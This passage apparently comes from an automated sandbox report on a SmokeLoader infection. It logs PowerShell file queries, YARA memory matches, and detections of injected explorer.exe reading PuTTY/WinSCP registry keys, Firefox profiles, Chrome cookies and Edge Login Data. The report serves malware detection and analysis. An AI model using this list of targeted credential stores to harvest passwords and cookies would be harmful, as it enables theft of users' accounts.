Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wihaduv	Queries volume information: C:\Users\user\AppData\Roaming\wihaduv VolumeInformation
Source: C:\Users\user\AppData\Roaming\wihaduv	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 19_2_02972112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,

19_2_02972112

Source: C:\Windows\explorer.exe

Code function: 14_2_02493490 GetUserNameW,

14_2_02493490

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 19_2_02972198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,

19_2_02972198

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000018.00000002.2534825073.0000000002A21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.2534653037.0000000000141000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4072, type: MEMORYSTR
Source: Yara match	File source: 13.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2537564234.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1778514490.0000000000DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.1779109929.0000000002791000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\db\data.safe.bin
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\favicons.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\containers.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\xulstore.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\events\background-update
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\sessionstore-backups\previous.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\webappsstore.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dtbqpus9.default\times.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\session-state.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499497826.a275b456-884f-44cd-99f6-41f5ee4092ba.main.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\saved-telemetry-pings\5bf0a14b-0281-4d70-9b35-ffc28432d5f1
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\addons.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\saved-telemetry-pings\7246f3c2-1d10-4546-a55f-90f67de31b41
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\ls-archive.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\pending_pings\39670ac0-d7c4-4e16-ab34-d16ebbe23b2c
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499493080.5bf0a14b-0281-4d70-9b35-ffc28432d5f1.main.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\protections.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\ExperimentStoreData.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\pkcs11.txt
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499497797.7246f3c2-1d10-4546-a55f-90f67de31b41.health.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\pending_pings\9938bf8b-a4c5-48e9-b997-3ebf2ee8cc32
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\favicons.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\AlternateServices.txt
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\permissions.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499493081.f660d059-6f2e-4e72-b06a-df12c9ef02fc.first-shutdown.jsonlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\content-prefs.sqlite
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\shield-preference-experiments.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\search.json.mozlz4
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\glean\events\events
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\handlers.json
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite-shm
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\datareporting\archived\2023-10\1696499497813.5bfd2570-f400-4e52-b6dc-002ad477b461.event.jsonlz4
